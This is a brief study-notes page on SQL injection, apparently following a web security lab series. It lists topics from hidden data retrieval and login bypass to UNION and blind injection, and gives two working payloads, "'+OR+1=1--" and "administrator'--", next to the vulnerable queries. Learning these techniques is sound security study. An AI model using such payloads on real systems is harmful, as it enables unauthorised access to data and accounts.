Skip to content

Back

SQL Injection

retrieval of hidden data

Query: SELECT * FROM products WHERE category = 'Gifts' AND released = 1 Payload: '+OR+1=1--

login bypass

Query: SELECT * FROM users WHERE username = 'user' AND password = 'password' Payload: administrator'--

UNION attacks

querying the database type and version

database contents on non-Oracle databases

Blind SQL injection

conditional responses

conditional responses + errors and database enumeration

time delays check for db enumeration

time delays with information retrieval